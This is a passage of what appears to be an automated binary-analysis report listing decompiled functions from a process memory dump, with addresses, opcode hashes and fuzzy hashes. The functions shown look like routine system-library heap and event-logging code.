0x0168fe8e
0x0168fe8e
0x0168fea0
0x0168fea1
0x0168fea3
0x0168fea8
0x0168febd

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fc2eebc4b4e97c63467ff89e42d08ca43119abfba5e1bc258976b3f74aa42e
Instruction ID: 617554c27075ea96d2b31bd551b3fab730cf1dc1ada5e2ae38651d550562b0b1
Opcode Fuzzy Hash: 75fc2eebc4b4e97c63467ff89e42d08ca43119abfba5e1bc258976b3f74aa42e
Instruction Fuzzy Hash: BE018471A00259AFDB14EFA9DC45FAEBBB8EF54710F04406AB904EB381DA749901C794

Uniqueness

Uniqueness Score: -1.00%

Function 0168FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0168FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x16cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0161FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E015F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0161B640(E01619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0168fec0
0x0168fec0
0x0168fecf
0x0168fed9
0x0168fede
0x0168fee0
0x0168feeb
0x0168fef3
0x0168fef6
0x0168fef9
0x0168ff04
0x0168ff16
0x0168ff06
0x0168ff0f
0x0168ff0f
0x0168ff21
0x0168ff22
0x0168ff24
0x0168ff29
0x0168ff3e

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ae07c1c048444702c20aa640f90f9b25f54e99b120b992bfaba258ca81a88c
Instruction ID: 138f6b1fda72e006e55810a114e51429f54c281450a5f1b9a8eb32236c87103d
Opcode Fuzzy Hash: 07ae07c1c048444702c20aa640f90f9b25f54e99b120b992bfaba258ca81a88c
Instruction Fuzzy Hash: F3018471A00219AFDB14EBA9DC45FAEBBB8EF55710F44406AB904EB380EA749A41C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 016A8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E016A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x16cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E015F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0161B640(E01619AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x016a8a62
0x016a8a71
0x016a8a79
0x016a8a82
0x016a8a85
0x016a8a89
0x016a8a8c
0x016a8a8f
0x016a8a92
0x016a8a95
0x016a8a9f
0x016a8ab1
0x016a8aa1
0x016a8aaa
0x016a8aaa
0x016a8abc
0x016a8abd
0x016a8abf
0x016a8ac4
0x016a8ada

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a66c25f79cd8d7450d5848a2af49f4c3ae9d37efd8e01a8be32b506fe3577667
Instruction ID: 586f2092ab9112989e2508b3d626736bff49a65ec7bb43f6fd3ecbf50ac77651
Opcode Fuzzy Hash: a66c25f79cd8d7450d5848a2af49f4c3ae9d37efd8e01a8be32b506fe3577667
Instruction Fuzzy Hash: 18012CB1A0021DAFCB00DFA9D9559AEBBB8FF58310F54405AFA04E7341D634AD01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 016A8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E016A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x16cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E015F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0161B640(E01619AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x016a8ed6
0x016a8ee5
0x016a8eed
0x016a8ef0
0x016a8efa
0x016a8f03
0x016a8f0c
0x016a8f15
0x016a8f24
0x016a8f27
0x016a8f31
0x016a8f43
0x016a8f33
0x016a8f3c
0x016a8f3c
0x016a8f4e
0x016a8f4f
0x016a8f51
0x016a8f56
0x016a8f69

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 006155b6f798e4dc238b690a5544f1278f60184b23863c121772d6ebe4a68dd4
Instruction ID: af0e2055d08a3738051419b8f768b8ead697d360c15c1a9f36845c5aa5456cad
Opcode Fuzzy Hash: 006155b6f798e4dc238b690a5544f1278f60184b23863c121772d6ebe4a68dd4
Instruction Fuzzy Hash: 7C11127190021A9FDB04DFA9D941BADB7F4FF08300F4442AAE918EB381D6349941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 015DDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E015DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E015DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L015DE8B0(__ecx, _t14, 0xfff);
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x015ddb64
0x015ddb66
0x015ddb6b
0x015ddbaa
0x015ddb71
0x015ddb76
0x015ddb7a
0x015ddba3
0x015ddb7c
0x015ddb87
0x015ddb8b
0x01634fa1
0x01634fb3
0x01634fb8
0x015ddb91
0x015ddb96
0x015ddb98
0x015ddb98
0x015ddb8b
0x015ddb7a
0x015ddb9d
0x015ddba2

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 1dec86ac77b324458d869a3da1c56009035a63e2922ade4d1417151281ecc88c
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: EDF0C8332415639BF3325ADD8880B6BB6A5AFD1A64F160435F2059F284C96498028FD0

Uniqueness

Uniqueness Score: -1.00%

Function 015DB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E015F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E015F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01657016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x015db1e8
0x015db1ea
0x015db1f3
0x01634a17
0x015db1f9
0x015db1f9
0x015db1f9
0x015db201
0x01634a21
0x01634a2e
0x00000000
0x00000000
0x01634a3b
0x01634a4d
0x01634a3d
0x01634a46
0x01634a46
0x01634a55
0x00000000
0x00000000
0x00000000
0x015db20a
0x015db20a
0x015db20a
0x015db20a

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: a3ab6cc3c156628ad41ef543bf50c87ce1c86e65f2e33e544aca7724d49a7511
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 66016D332006809BD332966DCC04B69BBDAFF96754F0A44A5EE158B7A2DA79C841C315

Uniqueness

Uniqueness Score: -1.00%

Function 0166FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0166FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x16cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E015F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0161B640(E01619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0166fe96
0x0166fe9e
0x0166fea1
0x0166fead
0x0166feb3
0x0166feb9
0x0166fec3
0x0166fed5
0x0166fec5
0x0166fece
0x0166fece
0x0166fee0
0x0166fee1
0x0166fee3
0x0166fee8
0x0166fefb

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c935df9fc51ab19c54d94bdefecf1edd471e176ecfff241363ae2d8f39dcfbd
Instruction ID: ee43f3e5796b814c869bc2af989831b3c6d1eff6ae794c0602a9c544677af5f3
Opcode Fuzzy Hash: 8c935df9fc51ab19c54d94bdefecf1edd471e176ecfff241363ae2d8f39dcfbd
Instruction Fuzzy Hash: B6016271A00209AFCB14DFA8D951A6EBBF4FF18704F1441A9A904DB382D635D902CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0169131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0169131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x16cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E015F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0161B640(E01619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0169131b
0x0169132a
0x01691330
0x01691336
0x0169133e
0x01691341
0x01691344
0x0169134f
0x01691361
0x01691351
0x0169135a
0x0169135a
0x0169136c
0x0169136d
0x0169136f
0x01691374
0x01691387

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b3a90991505bda9fcba5689e0fcac9a05ba3f11f774f5b20fe90c03cc95887
Instruction ID: e325c3ff5ed3cf1889fcfcae8b54525388b1584ffbf2cf29e83a102e9571b42f
Opcode Fuzzy Hash: 64b3a90991505bda9fcba5689e0fcac9a05ba3f11f774f5b20fe90c03cc95887
Instruction Fuzzy Hash: 83013C71A0120DAFCB04EFA9D945AAEB7F4FF58700F508069B905EB381E6349A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016A8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E016A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x16cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E015F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0161B640(E01619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x016a8f6a
0x016a8f79
0x016a8f81
0x016a8f84
0x016a8f8b
0x016a8f91
0x016a8f94
0x016a8f9e
0x016a8fb0
0x016a8fa0
0x016a8fa9
0x016a8fa9
0x016a8fbb
0x016a8fbc
0x016a8fbe
0x016a8fc3
0x016a8fd6

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3987d55839e6971988c7c9b219b1aa8c046fbeb475f5f880e8f02acfcf56158b
Instruction ID: 5a1f1fe3502c7b95df0d74a976c010385d7a81a676ccac5f89d62287a9b3868c
Opcode Fuzzy Hash: 3987d55839e6971988c7c9b219b1aa8c046fbeb475f5f880e8f02acfcf56158b
Instruction Fuzzy Hash: 5C014475A0020DAFDB00DFA8D945AAEB7F8FF58300F504459B905EB381DA34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01691608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01691608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x16cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E015F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0161B640(E01619AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01691608
0x01691617
0x0169161d
0x01691625
0x01691628
0x0169162b
0x01691636
0x01691648
0x01691638
0x01691641
0x01691641
0x01691653
0x01691654
0x01691656
0x0169165b
0x0169166e

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742d412145f1bb4e4729c2dbca0efa0acbad5cbab7747a621d5ae505aa5a9ac0
Instruction ID: 3eafd7640bd4319dc87a0de2341092f95b99b708ca947fed335383c0e8ff3808
Opcode Fuzzy Hash: 742d412145f1bb4e4729c2dbca0efa0acbad5cbab7747a621d5ae505aa5a9ac0
Instruction Fuzzy Hash: 22F06D71E00259EFDB14EFA9D815AAEBBF8FF19300F444069A905EB381EA349900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 015FC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E015FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x15b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E016A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x015fc577
0x015fc57d
0x015fc581
0x015fc5b5
0x015fc5b9
0x015fc5ce
0x015fc5ce
0x015fc5ca
0x00000000
0x015fc5ca
0x015fc5c4
0x015fc5c8
0x00000000
0x00000000
0x00000000
0x015fc5ad
0x00000000
0x015fc5af

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8cb92799ad9ef2dd89da73a41667bec240caac6fa495f3f8bd613909bcbd7c
Instruction ID: f4a4a7c78293210343e15fb70781dcb732a9b814a73009969af36d527478dd06
Opcode Fuzzy Hash: aa8cb92799ad9ef2dd89da73a41667bec240caac6fa495f3f8bd613909bcbd7c
Instruction Fuzzy Hash: 27F090B2D166A99EE736D76C804CF257FD8BB06770F45487ED7058F102C6A4D880C650

Uniqueness

Uniqueness Score: -1.00%

Function 01692073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01692073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0168FD22(__ecx);
				_t19 =  *0x16c849c - _t3; // 0x6d73b88f
				if(_t19 == 0) {
					__eflags = _t17 -  *0x16c8748; // 0x0
					if(__eflags <= 0) {
						E01691C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x16c8724 & 0x00000004;
							if(( *0x16c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x16c8724; // 0x0
					return E01688DF1(__ebx, 0xc0000374, 0x16c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01692076
0x01692078
0x0169207d
0x01692083
0x016920a4
0x016920aa
0x016920ac
0x016920b7
0x016920ba
0x016920bc
0x016920c9
0x016920c9
0x016920d0
0x016920d2
0x00000000
0x016920d2
0x016920be
0x016920c3
0x016920c5
0x016920c7
0x00000000
0x00000000
0x016920c7
0x016920bc
0x016920d4
0x01692085
0x01692085
0x016920a3
0x016920a3

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b418cc7a285e78b6b2c5102b20ae850bdaa409f3a4d234737353b015e0a39117
Instruction ID: 9552c303d65f1b43b0e14b0a9577157efe32d972f3663ae88e2b5505b5fdb900
Opcode Fuzzy Hash: b418cc7a285e78b6b2c5102b20ae850bdaa409f3a4d234737353b015e0a39117
Instruction Fuzzy Hash: 37F027674122959FDF326F282D242F63B8ED795110B0A208ED45017305C63988A3CB34

Uniqueness

Uniqueness Score: -1.00%

Function 0161927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0161927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0161FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E016192C6(_t11, _t14);
				}
				return _t11;
			}

0x01619295
0x01619299
0x0161929f
0x016192aa
0x016192ad
0x016192ae
0x016192af
0x016192b0
0x016192b4
0x016192bb
0x016192bb
0x016192c5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 2a5eddb9fd6cacd49bd1f5f318f069a719265f93a6df24d1b6fb82f42efb9f14
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: F1E02B323405416BE7219E09CC80F43376DEFD2724F04407CB9041E242C6E5DD0887A4

Uniqueness

Uniqueness Score: -1.00%

Function 016A8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E016A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x16cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E015F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0161B640(E01619AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x016a8d34
0x016a8d43
0x016a8d4b
0x016a8d4e
0x016a8d52
0x016a8d5c
0x016a8d6e
0x016a8d5e
0x016a8d67
0x016a8d67
0x016a8d79
0x016a8d7a
0x016a8d7c
0x016a8d81
0x016a8d94

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda6dc85ff8e3fe415bba2f908e28877231209bfd00348fc07b1c06afc0f0084
Instruction ID: 48b272795887f6d505d9f8809d7afd899fe0b15ef2001ebdfc04206767e0a03e
Opcode Fuzzy Hash: dda6dc85ff8e3fe415bba2f908e28877231209bfd00348fc07b1c06afc0f0084
Instruction Fuzzy Hash: 05F0B471A046099FDB14EFB8D841A6E77B8FF18300F5080A9E905EB380DA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016A8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E016A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x16cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E015F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0161B640(E01619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x016a8b67
0x016a8b6f
0x016a8b72
0x016a8b7d
0x016a8b8f
0x016a8b7f
0x016a8b88
0x016a8b88
0x016a8b9a
0x016a8b9b
0x016a8b9d
0x016a8ba2
0x016a8bb5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6429097e2470b44ea45905f6407498a5ceda3501bcb2915e031b49f0d15c53d7
Instruction ID: 9c9458aa5d591abe195a86410c352b74432fef572d65fef7623c5657d3141224
Opcode Fuzzy Hash: 6429097e2470b44ea45905f6407498a5ceda3501bcb2915e031b49f0d15c53d7
Instruction Fuzzy Hash: 51F05EB1A04259ABDB10EBA8DD16A6E77B8BB18300F440459AA05DB380EB34D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 015F746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E015F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E015EEB70(__ecx, 0x16c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E016195D0();
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x015f746d
0x015f746d
0x015f746d
0x015f7471
0x015f7488
0x0163f92d
0x015f748e
0x015f7491
0x015f7495
0x0163f937
0x0163f93a
0x0163f94e
0x0163f953
0x0163f956
0x0163f956
0x015f7495
0x00000000
0x015f7488
0x015f7473
0x015f7478
0x015f747d
0x015f7481
0x00000000
0x015f7481
0x015f747d
0x015f747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c815e622a2aae8f7d093b481c5ada0234e23ca3f7290cfb5ef0766a6c62d0d9b
Instruction ID: 98c90df31ac414218084d3bbdc33f1558a3a6e93ea5d71e4a3c4be44fb42e79e
Opcode Fuzzy Hash: c815e622a2aae8f7d093b481c5ada0234e23ca3f7290cfb5ef0766a6c62d0d9b
Instruction Fuzzy Hash: 89F0BE34900146AADF029B6CCC44FBABFA2BF48250F040A9DDA51AF1A1E72598028B96

Uniqueness

Uniqueness Score: -1.00%

Function 016A8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E016A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x16cd360 ^ _t25;
